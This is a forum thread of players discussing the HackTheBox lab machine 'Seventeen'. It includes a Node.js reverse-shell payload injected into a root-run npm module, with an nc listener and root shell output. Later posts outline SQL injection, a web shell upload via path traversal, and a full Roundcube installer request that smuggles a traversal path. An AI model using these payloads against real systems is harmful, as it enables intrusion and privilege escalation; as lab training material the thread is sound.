Seventeen - HTB [Discussion]
(June 2, 2022, 08:34 AM)Cipher Wrote:
(May 30, 2022, 03:13 AM)Himitsu Wrote:
(May 30, 2022, 01:54 AM)Peter Wrote:
(May 29, 2022, 06:27 AM)dude4695 Wrote: for root

better create 2 SSH connections: 1 for running startup.sh and 1 for editing the file

ssh1: sudo /opt/app/startup.sh

ssh2: vim /opt/app/node_modules/loglevel/lib/loglevel.js

and add this function at the top of the file

(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("bash", []);
    var client = new net.Socket();
    client.connect(PORT, "IP", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application from crashing
})();

you can get this payload from here

https://www.revshells.com/

stop the startup.sh app and run it again and you will get a root shell


I can't make it run. The file disappears. No reverse shell, the code to inject vanishes. Any tip or idea, please?


You need to do this a little bit faster, otherwise the loglevel directory will be removed.

Copy this function to the clipboard (Ctrl+C) and replace the IP and PORT with your own:

(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("bash", []);
    var client = new net.Socket();
    client.connect(4000, "10.10.1X.XX", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application from crashing
})();


1. On Terminal 1, open an SSH session as the kavi user
2. On Terminal 2, open a second SSH session as the kavi user
then prepare your command (but don't run it yet, because the file does not exist yet):
vim /opt/app/node_modules/loglevel/lib/loglevel.js

3. On Terminal 3:
nc -lvnp 4000

4. On Terminal 1:
sudo /opt/app/startup.sh

5. On Terminal 2:
run your previous command and paste your function from step 2 at the TOP of the file
then write and quit (:x is faster)

6. On Terminal 1:
quit and re-run sudo /opt/app/startup.sh

7. On Terminal 3:
you can see that your reverse shell has been triggered:
─$ nc -lvnp 4000        
listening on [any] 4000 ...

connect to [10.10.XX.XX] from (UNKNOWN) [10.10.11.165] 50614
uid=0(root) gid=0(root) groups=0(root)


You need to switch quickly between your 2 SSH sessions for steps 4, 5 and 6, that's all.

All explanations from @Dude4695 are enough.


"/opt/app/node_modules/loglevel/lib/loglevel.js" E212: Can't open file for writing


Error writing /opt/app/node_modules/loglevel/lib/loglevel.js: Permission denied
Reply
nothing new yet?
Reply
(June 4, 2022, 11:37 AM)sydewayzlocc Wrote: nothing new yet?


I am personally stuck.

I don't want spoilers nor solve the machine without understanding the steps.

I think that most current solvers just went through an unintended path, as most people used RCE via file upload on the "oldmanagement" site.
It seems to me that the point of logging in to the student site is to get the PDF file where it mentions the "mastermailer", but I cannot figure out a way to progress from here. It's possible to reconfigure Roundcube, but I didn't find a way to extract some (useful) credentials or get RCE.
Reply
(June 4, 2022, 11:57 AM)coolbyte Wrote:
(June 4, 2022, 11:37 AM)sydewayzlocc Wrote: nothing new yet?


I am personally stuck.

I don't want spoilers nor solve the machine without understanding the steps.

I think that most current solvers just went through an unintended path, as most people used RCE via file upload on the "oldmanagement" site.
It seems to me that the point of logging in to the student site is to get the PDF file where it mentions the "mastermailer", but I cannot figure out a way to progress from here. It's possible to reconfigure Roundcube, but I didn't find a way to extract some (useful) credentials or get RCE.

Stuck here too, as you cannot get a PHP shell? Is it possible to get a shell via sqlmap?
Reply
Hi everybody. About @Yondaime316 method:

Folder /home/kavi/.npm is empty. And where is file package.tgz?
Thanks.
Reply
(June 5, 2022, 07:16 AM)orangutang Wrote: Hi everybody. About @Yondaime316 method:

Folder /home/kavi/.npm is empty. And where is file package.tgz?
Thanks.
Reply
Just to sum up the situation for the people late to the party.

Almost none of the main steps described in the first pages of this thread still work, the machine was patched 5 days ago.

The steps so far are:

1. Discover exam subdomain

2. SQLi on the id parameter

3. Dump student credentials from DB

4. Login into student panel

5. Upload malicious shell, BUT, you need to modify the stud_no parameter to "31234/.." , because PHP execution inside the 31234 folder is blocked

6. You can trigger the shell directly through seventeen.htb:8000/oldmanager/files/shell.php, OR it can be triggered through a CVE of Roundcube. Obviously it doesn't make sense to complicate the situation, but I have a hunch that the Roundcube CVE was supposed to be the intended way, and that the machine maker just messed up the .htaccess file. So most likely the steps were supposed to be:

6.1 Go to mailmaster.seventeen.htb:8000/mailmaster/installer/

6.2 Upload a new configuration, where you will intercept and modify one of the _plugins_NAME parameters

_step=2&_product_name=Seventeen+Webmail&_support_url=&_skin_logo=&_temp_dir=%2Fvar%2Fwww%2Fhtml%2Fmastermailer%2Ftemp%2F&_des_key=iajOofMkjvHYKGsQZzdASvEh&_spellcheck_engine=googie&_identities_level=0&_log_driver=file&_log_dir=%2Fvar%2Fwww%2Fhtml%2Fmastermailer%2Flogs%2F&_syslog_id=roundcube&_syslog_facility=8&_dbtype=mysql&_dbhost=127.0.0.1&_dbname=roundcubedb&_dbuser=mysqluser&_dbpass=mysqlpassword&_db_prefix=&_default_host%5B%5D=127.0.0.1&_default_port=143&_username_domain=&_auto_create_user=1&_sent_mbox=Sent&_trash_mbox=Trash&_drafts_mbox=Drafts&_junk_mbox=Junk&_smtp_server=127.0.0.1&_smtp_port=587&_smtp_user=%25u&_smtp_pass=%25p&_smtp_user_u=1&_language=&_skin=elastic&_mail_pagesize=50&_addressbook_pagesize=50&_htmleditor=0&_draft_autosave=300&_mdn_requests=0&_mime_param_folding=1&_plugins_example_addressbook=example_addressbook&_plugins_filesystem_attachments=filesystem_attachments&_plugins_help=../../../../../../../../var/www/html/oldmanagement/files/31234&submit=UPDATE+CONFIG


This will make roundcube load a file at path /var/www/html/mastermailer/plugins/../../../../../../var/www/html/oldmanagement/files/31234/../../../../../../var/www/html/oldmanagement/files/31234.php, which means that both the path 31234 and the file called 31234.php need to exist at the same level.

7. Once a shell is obtained in the container, you can find the credentials for Mark in the dbh.php file

8. SSH into the box as Mark

Here is where I stopped.

- The file where other users have previously found the password for the kavi user is not readable anymore

- The /opt/app/node_modules/ directory is not writable anymore, so the rogue JS package cannot just be written there

- There is a Verdaccio registry locally on port 4873. I am assuming that we should find a way to publish packages through it, but user registration is disabled and no anonymous publishing is allowed (and neither mark nor kavi has access to it). The configuration of Verdaccio is not even readable (/etc/verdaccio).

- There is a whole mail stack on the machine; it is really strange that it would be completely useless for solving the machine.

- There is another web app on port 31225 which I am not sure what it is.

It would be nice if someone found a legit way to get the password for the kavi user (i.e., not just from /opt/app/node_modules/db-logger/). I am giving up on this machine because it seems really poorly made and at this point it is just a waste of time without much learning.
Reply
(June 5, 2022, 09:04 AM)coolbyte Wrote: Just to make the point of the situation for the people late to the party.

Almost none of the main steps described in the first pages of this thread still work, the machine was patched 5 days ago.
The steps so far are:
1. Discover exam subdomain

2. SQLi on the id parameter

3. Dump student credentials from DB

4. Login into student panel

5. Upload malicious shell, BUT, you need to modify the stud_no parameter to "31234/.." , because PHP execution inside the 31234 folder is blocked

6. You can trigger the shell directly through seventeen.htb:8000/oldmanager/files/shell.php, OR it can be triggered through a CVE of Roundcube. Obviously it doesn't make sense to complicate the situation, but I have a hunch that the Roundcube CVE was supposed to be the intended way, and that the machine maker just messed up the .htaccess file. So most likely the steps were supposed to be:

6.1 Go to mailmaster.seventeen.htb:8000/mailmaster/installer/

6.2 Upload a new configuration, where you will intercept and modify one of the _plugins_NAME parameters
_step=2&_product_name=Seventeen+Webmail&_support_url=&_skin_logo=&_temp_dir=%2Fvar%2Fwww%2Fhtml%2Fmastermailer%2Ftemp%2F&_des_key=iajOofMkjvHYKGsQZzdASvEh&_spellcheck_engine=googie&_identities_level=0&_log_driver=file&_log_dir=%2Fvar%2Fwww%2Fhtml%2Fmastermailer%2Flogs%2F&_syslog_id=roundcube&_syslog_facility=8&_dbtype=mysql&_dbhost=127.0.0.1&_dbname=roundcubedb&_dbuser=mysqluser&_dbpass=mysqlpassword&_db_prefix=&_default_host%5B%5D=127.0.0.1&_default_port=143&_username_domain=&_auto_create_user=1&_sent_mbox=Sent&_trash_mbox=Trash&_drafts_mbox=Drafts&_junk_mbox=Junk&_smtp_server=127.0.0.1&_smtp_port=587&_smtp_user=%25u&_smtp_pass=%25p&_smtp_user_u=1&_language=&_skin=elastic&_mail_pagesize=50&_addressbook_pagesize=50&_htmleditor=0&_draft_autosave=300&_mdn_requests=0&_mime_param_folding=1&_plugins_example_addressbook=example_addressbook&_plugins_filesystem_attachments=filesystem_attachments&_plugins_help=../../../../../../../../var/www/html/oldmanagement/files/31234&submit=UPDATE+CONFIG
This will make roundcube load a file at path /var/www/html/mastermailer/plugins/../../../../../../var/www/html/oldmanagement/files/31234/../../../../../../var/www/html/oldmanagement/files/31234.php, which means that both the path 31234 and the file called 31234.php need to exist at the same level.

7. Once a shell is obtained in the container, you can find the credentials for Mark in the dbh.php file

8. SSH into the box as Mark

Here is where I stopped.
- The file where other users have previously found the password for kavi user is not readable anymore

- The /opt/app/node_modules/ directory is not writable anymore, so the rogue JS package cannot just be written there

- There is a Verdaccio registry locally on port 4873. I am assuming that we should find a way to publish packages through it, but user registration is disabled and no anonymous publishing is allowed (and neither mark nor kavi has access to it). The configuration of Verdaccio is not even readable (/etc/verdaccio).

- There is a whole mail stack on the machine, it is really strange that it would be completely useless for the machine to be solved.

- There is another web app on port 31225 which I am not sure what it is.

It would be nice if someone found a legit way to get the password for the kavi user (i.e., not just from /opt/app/node_modules/db-logger/). I am giving up on this machine because it seems really poorly made and at this point it is just a waste of time without much learning.

But how do you find the student panel? I used raft-big, directory-big, and a lot more, I searched for "oldmanagement" in all of SecLists and didn't find anything, the closest was "Aholdmanagement" so what wordlist did you use?
Reply
You can find oldmanagement from the database dump (from the SQLi). You will find, for example, some files with ../oldmanagement/avatar.jpg or something. From there I assumed that oldmanagement was another site. And you can reach it at seventeen.htb:8000/oldmanagement/
Reply
seems like it's all patched
Reply